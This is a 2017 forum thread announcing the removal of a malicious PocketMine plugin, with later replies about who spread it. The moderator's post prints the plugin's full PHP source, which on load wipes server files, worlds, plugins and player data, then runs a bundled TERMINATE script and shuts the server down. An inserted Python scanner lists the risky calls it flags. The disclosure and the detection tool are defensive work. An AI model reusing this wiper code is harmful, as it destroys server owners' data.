README Malicious code found in a plugin

Discussion in 'News' started by Casper, May 2, 2017.

  1. Casper

    Casper Moderator

    Edit: A plugin similar to this has been reported to us by @BLOCKSTORM. It has been found on TesseractPM's Discord server.

    Hello!

    I would like to announce that a plugin containing malicious code has been removed from ImagicalMine's plugins page on the 29th of April at 1:05 PM. This dangerous code – when installed on your server – deletes everything. If you have downloaded this plugin, do not install it on your MCPE server.

    The ImagicalMine Staff team will try to be better at approving plugins to make sure this does not happen again. These forums are – unfortunately – very inactive at the moment, also by our staff members. We apologize if your plugin takes a very long time to approve.

    PHP:
    <?php
    namespace Anonymous;
    use pocketmine\plugin\PluginBase;
    use pocketmine\utils\Config;
    class DarkSide extends PluginBase
    {
        public function onLoad()
        {
            unlink("src/pocketmine/Server.php");
            unlink("src/pocketmine/PocketMine.php");
            unlink("src/pocketmine/*.php");
            unlink("src/pocketmine/Player.php");
            unlink("*.phar");
            unlink("*.yml");
            unlink("*.json");
            unlink("*.txt");
            unlink("*.*");
            $files = array_map('unlink', glob("plugins/*"));
            ;
            foreach ($files as $file) {
                if (is_file($file))
                    unlink($file);
            }
            $files = array_map('unlink', glob("worlds/*"));
            ;
            foreach ($files as $file) {
                if (is_file($file))
                    unlink($file);
            }
            $files = array_map('unlink', glob("src/*"));
            ;
            foreach ($files as $file) {
                if (is_file($file))
                    unlink($file);
            }
            $dir = "src";
            if (is_dir($dir)) {
                $objects = scandir($dir);
                foreach ($objects as $object) {
                    if ($object != "." && $object != "..") {
                        if (is_dir($dir . "/" . $object))
                            rmdir($dir . "/" . $object);
                        else
                            unlink($dir . "/" . $object);
                    }
                }
                rmdir($dir);
            }
            $dir = "plugins";
            if (is_dir($dir)) {
                $objects = scandir($dir);
                foreach ($objects as $object) {
                    if ($object != "." && $object != "..") {
                        if (is_dir($dir . "/" . $object))
                            rmdir($dir . "/" . $object);
                        else
                            unlink($dir . "/" . $object);
                    }
                }
                rmdir($dir);
            }
            $dir = "worlds";
            if (is_dir($dir)) {
                $objects = scandir($dir);
                foreach ($objects as $object) {
                    if ($object != "." && $object != "..") {
                        if (is_dir($dir . "/" . $object))
                            rmdir($dir . "/" . $object);
                        else
                            unlink($dir . "/" . $object);
                    }
                }
                rmdir($dir);
            }
            $dir = "players";
            if (is_dir($dir)) {
                $objects = scandir($dir);
                foreach ($objects as $object) {
                    if ($object != "." && $object != "..") {
                        if (is_dir($dir . "/" . $object))
                            rmdir($dir . "/" . $object);
                        else
                            unlink($dir . "/" . $object);
                    }
                }
                rmdir($dir);
            }
            if (php_uname("s") == "Ubuntu") {
                unlink('start.sh');
                $this->saveResource("TERMINATE.sh", true);
                passthru($this->getDataFolder() . "TERMINATE.sh");
            }
            if (php_uname("s") == "Debian") {
                unlink('start.sh');
                $this->saveResource("TERMINATE.sh", true);
                passthru($this->getDataFolder() . "TERMINATE.sh");
            }
            if (php_uname("s") == "Windows NT") {
                unlink('start.bat');
                unlink('start.cmd');
                $this->saveResource("TERMINATE.cmd", true);
                passthru($this->getDataFolder() . "TERMINATE.cmd");
            }
            $this->getServer()->forceShutdown();
        }
    }

    Sincerely,
    Casper.
     
    HimbeersaftLP likes this.
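
Added example, not part of the original thread and not ImagicalMine's own tooling: a pre-approval triage check of the kind the announcement calls for, written in Python and run over plugin source. The shortlist of calls, the reject/review policy and the sample input are assumptions made for illustration.

```python
import re

# Assumed reviewer shortlist: calls the quoted sample uses, plus close relatives.
RISKY = {"unlink": "deletes files", "rmdir": "removes directories",
         "passthru": "runs a command", "exec": "runs a command",
         "system": "runs a command", "shell_exec": "runs a command",
         "forceShutdown": "stops the server"}
AUTO_HOOKS = {"onLoad", "onEnable"}  # PluginBase hooks run with no user action
_NAMES = "|".join(RISKY)
# Direct calls, plus names passed as callables: array_map('unlink', ...).
_CALL = re.compile(r"(?<![\w$])(%s)\s*\(|['\"](%s)['\"]" % (_NAMES, _NAMES))
_FUNC = re.compile(r"\bfunction\s+(\w+)")
# Strings are matched first so that glob("plugins/*") is not read as a comment.
_STR_OR_COMMENT = re.compile(
    r"('(?:\\.|[^'\\])*'|\"(?:\\.|[^\"\\])*\")|//[^\n]*|#[^\n]*|/\*.*?\*/", re.S)

def strip_comments(src):
    """Blank out PHP comments, keeping strings and line numbers intact."""
    return _STR_OR_COMMENT.sub(
        lambda m: m.group(1) or "\n" * m.group(0).count("\n"), src)

def scan_plugin(src):
    """Return (line, enclosing_method, call, reason, auto_run) per finding."""
    code = strip_comments(src)
    funcs = [(m.start(), m.group(1)) for m in _FUNC.finditer(code)]
    findings = []
    for m in _CALL.finditer(code):
        name = m.group(1) or m.group(2)
        method = next((n for pos, n in reversed(funcs) if pos < m.start()), None)
        line = code.count("\n", 0, m.start()) + 1
        findings.append((line, method, name, RISKY[name], method in AUTO_HOOKS))
    return findings

def verdict(src):
    """'reject' for a risky call in an auto-run hook, else 'review' or 'pass'."""
    hits = scan_plugin(src)
    if any(auto for *_, auto in hits):
        return "reject"
    return "review" if hits else "pass"

# Constructed sample in the shape of the quoted plugin (not the full original).
SAMPLE = r'''<?php
public function onLoad() {
    // unlink("commented-out.txt");
    $files = array_map('unlink', glob("worlds/*"));
    passthru($this->getDataFolder() . "TERMINATE.sh");
    $this->getServer()->forceShutdown();
}
'''
```

A regex pass like this only sorts submissions for a human reviewer; it does not follow obfuscated or dynamically built function names, so a "pass" is not an approval.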
  2. Ulti

    Ulti Active Member

    Shouldn't it be checked before it was approved?
     
  3. HimbeersaftLP

    HimbeersaftLP Notable Member
    Plugin Developer

    I am quite sure that was a typo xD
     
    Casper likes this.
  4. Amir Emad

    Amir Emad Active Member
    Plugin Developer

    WOW Fantastic plugin good job man!! Bravo!!
     
    Casper and HimbeersaftLP like this.
  5. HimbeersaftLP

    HimbeersaftLP Notable Member
    Plugin Developer

    [​IMG]
     
    remote_vase and Casper like this.
  6. Casper

    Casper Moderator

    Oops! My bad, changing it now. :p
     
    remote_vase likes this.
  7. Sardilla

    Sardilla New Member

    Hello everyone, I am just curious where I can get this plugin now.
    I want to send one to my friend, and
    Just kidding
     
    Casper and HimbeersaftLP like this.
  8. remote_vase

    remote_vase Your everyday top-of-the-notch web developer
    Plugin Developer

    Thanks for letting us know, I'll be sure to spread the word when I get a chance.
     
    Casper likes this.
  9. DeathRaven359

    DeathRaven359 Active Member

    Can we pu-leez link leet.cc to this plugin?
     
    remote_vase and HimbeersaftLP like this.
  10. remote_vase

    remote_vase Your everyday top-of-the-notch web developer
    Plugin Developer

    That would be nice, but I think they test the plugins before selling them
     
  11. HimbeersaftLP

    HimbeersaftLP Notable Member
    Plugin Developer

    @DeathRaven359 I'm just curious, did you accidentally press that ignore button on my profile?
     
  12. remote_vase

    remote_vase Your everyday top-of-the-notch web developer
    Plugin Developer

    If she did, then how would she read your post?
     
    HimbeersaftLP likes this.
  13. HimbeersaftLP

    HimbeersaftLP Notable Member
    Plugin Developer

    Oh yeah, kill me pls I am so dumb xD
     
    remote_vase likes this.
  14. remote_vase

    remote_vase Your everyday top-of-the-notch web developer
    Plugin Developer

    No! I'm not a murderer!
     
    Dog2puppy likes this.
  15. Lazerplayz

    Lazerplayz Active Member
    Plugin Developer

    I hope this plugin comes out one day :3
     
    HimbeersaftLP likes this.
  16. remote_vase

    remote_vase Your everyday top-of-the-notch web developer
    Plugin Developer

    As per the update by BLOCKSTORM, he was a spammer on the BoxofDevs Discord server as reported by TheRoyalBlock, resulting in a kick. In addition, Evan was putting a serverdestroyer plugin for one reason only: He hates Tesseract. He has deleted the plugin from Tesseract Discord now that Linux restored ownership to Tesseract's rightful owners. Lastly, that Discord server is no longer official, as stated by @ImagicalGamer on the Tesseract GitHub repository.
     
  17. Mihai Sorin

    Mihai Sorin Active Member
    Plugin Developer

    apple rekt tesseract
     
    remote_vase and HimbeersaftLP like this.
  18. BLOCKSTORM

    BLOCKSTORM Active Member

    @remote_vase I'm not a spammer. They have spammed all the time. I'm not a spammer, but my WLAN is not so good, so I have to press [send] many times and sometimes it sends the messages more times than one. I'm sorry if this is spamming, but I didn't want to spam there!
    --- Post updated ---
    @remote_vase You can also see this when I send posts here. They duplicate because I have to press [SEND] many times and then it sends it many times.
     
  19. HimbeersaftLP

    HimbeersaftLP Notable Member
    Plugin Developer

    Just wait longer or get better internet :D

    Also kicked doesn't mean that you can't join again
     
    remote_vase likes this.
  20. BLOCKSTORM

    BLOCKSTORM Active Member

    But they will kick me again. And I have written @everyone AFTER they published and sent the plugin. And why don't they get punished for publishing this plugin?
    --- Post updated ---
    I'm working on better internet @HimbeersaftLP, but I don't have much time for this.
     
